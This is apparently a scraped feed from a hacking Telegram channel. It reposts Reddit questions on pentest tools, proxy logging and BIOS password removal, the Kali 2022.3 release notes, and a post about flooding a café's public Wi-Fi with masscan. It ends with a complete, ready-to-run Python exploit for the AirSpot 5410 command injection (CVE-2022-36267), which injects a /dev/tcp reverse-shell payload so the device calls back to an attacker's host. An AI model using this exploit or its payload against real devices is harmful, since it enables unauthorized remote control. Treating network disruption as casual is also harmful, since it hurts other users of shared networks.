Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Defensics Fuzz Testing VS Core Impact
https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/

Hi everyone.
I am quite new to PenTesting. Sorry if my question is stupid So my place got new hardware and stuff. And i got a mission to figure out the difference between these 2 penetration tests tools. Defensics Fuzz Testing and Core Impact So would you guys help me out understanding what the differences between those two are. And if i have one of them. Which will be better?? Or will i need to have both to cover everything??? Many thanks reddit community!!! submitted by /u/gameboybin (https://www.reddit.com/user/gameboybin)
[link] (https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/) [comments] (https://www.reddit.com/r/Pentesting/comments/wlgyw4/defensics_fuzz_testing_vs_core_impact/)

___________________________
@hacking_Attack
@Hacking_Video
My Experience on Hacking the Dutch Government

Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government…Continue reading on Medium »
Read more...
Panera Bread Public Network security is just sad.
https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/

I recently was at a Panera Bread, and their public network security was just horrible. Two of the main issues included: A: no good qos system, i was able to DoS the network by simply hogging the bandwith with masscan. no webpages or anything could load for other users while this command was running on my laptop B: Port 25 outbound is not blocked, which makes it extremely easy to scan the internet for open smtp relays to send spam mail from, this could be happening from a malicous actor in the building or a compromised computer on the network. So yeah the security sucks and it is very exploitable, especially for use to connect to unsecure smtp servers and send spam mail. submitted by /u/EvansMBgaming (https://www.reddit.com/user/EvansMBgaming)
[link] (https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/) [comments] (https://www.reddit.com/r/Pentesting/comments/wlijye/panera_bread_public_network_security_is_just_sad/)

___________________________
@hacking_Attack
@Hacking_Video
Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution

Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.The highlights for Kali’s 2022.3’s release:Discord Server - Kali’s new community real-time chat option has launched!Test Lab Environment - Quickly create a test bed to learn, practice, and benchmark tools and compare their resultsOpening Kali-Tools Repo - We have opened up the Kali tools repository & are accepting your submissions!Help Wanted - We are looking for a Go developer to help us on an open-source projectKali NetHunter Updates - New releases in our NetHunter storeVirtual Machines Updates - New VirtualBox image format, weekly images, and build-scripts to build your ownNew Tools In Kali - Would not be a release without some new tools!For more details, see the bug tracker changelog.More info here.Download Kali Linux 2022.3
Read more...
Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.
The highlights for Kali’s 2022.3’s release:Discord Server (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-is-on-discord) - Kali’s new community real-time chat option has launched!Test Lab Environment (https://www.kali.org/blog/kali-linux-2022-3-release/#test-lab-environment) - Quickly create a test bed to learn, practice, and benchmark tools and compare their resultsOpening Kali-Tools Repo (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-tools-documentation) - We have opened up the Kali tools repository & are accepting your submissions!Help Wanted (https://www.kali.org/blog/kali-linux-2022-3-release/#help-wanted) - We are looking for a Go developer to help us on an open-source projectKali NetHunter Updates (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-nethunter-updates) - New releases in our NetHunter storeVirtual Machines Updates (https://www.kali.org/blog/kali-linux-2022-3-release/#kali-for-virtual-machines) - New VirtualBox image format, weekly images, and build-scripts to build your ownNew Tools In Kali (https://www.kali.org/blog/kali-linux-2022-3-release/#new-tools-in-kali) - Would not be a release without some new tools!For more details, see the bug tracker changelog (https://bugs.kali.org/changelog_page.php).
More info here (https://www.kali.org/blog/kali-linux-2022-3-release/).


Download Kali Linux 2022.3 (https://www.kali.org/get-kali/)

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
socks5 proxies opsec

When you connect to a socks5 proxy what information can it log about your system when you connect to it?

submitted by /u/dannova23
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Post was deleted not sure why..??? BIOS password on G8 Elitebook.

Hey,

I am wondering how or is it poss to remove a BIOS password from a 850 G8 HP Elitebook.

Do the AMD an Intel variants of these laptops have the same BIOS chip, Can I use the https://bios-pw.org/ web site for this or must I remove the chip and re-program ?

All help is greatly appreciated,

Cheers,

Jay

submitted by /u/jaymcs76
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
AirSpot 5410 0.3.4.1-4 Remote Command Injection

https://4.bp.blogspot.com/-dXEgdVI0XVY/WWlvXX6BPpI/AAAAAAAAIOU/sj4iy4kTRsMzyN3cFQhci5D2DaW9DOMPwCLcBGAs/s1600/h52.png
AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.

SHA-256 | 0453a46f41ec4c59c37a44bb644827c11fe0d7e8677419a16aefa00836c95383

Download
# -*- coding: utf-8 -*-

# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
airspanLogo = """
,-.
/ \ `. __..-,O
: \ --''_..-'.'
| . .-' `. '.
: . .`.'
\ `. / ..
\ `. ' .
`, `. \
,|,`. `-.\
'.|| ``-...__..-`
| | Airspan
|__| AirSpot 5410
/||\ PWNED x_x
//||\\
// || \\
__//__||__\\__
'--------------'Necrum Security Labs

\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
url = 'https://{}:{}'.format(RHOST, RPORT)
try:
response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
if response.status_code != 200:
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
print('[INFO] Airspan device web interface seems reachable!')
except:
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
try:
print('[INFO] Executing reverse shell...')
response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
return
except Exception as e:
print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
return False

def main():
banner()
args = parser.parse_args()
pingWebInterface(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
main()

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video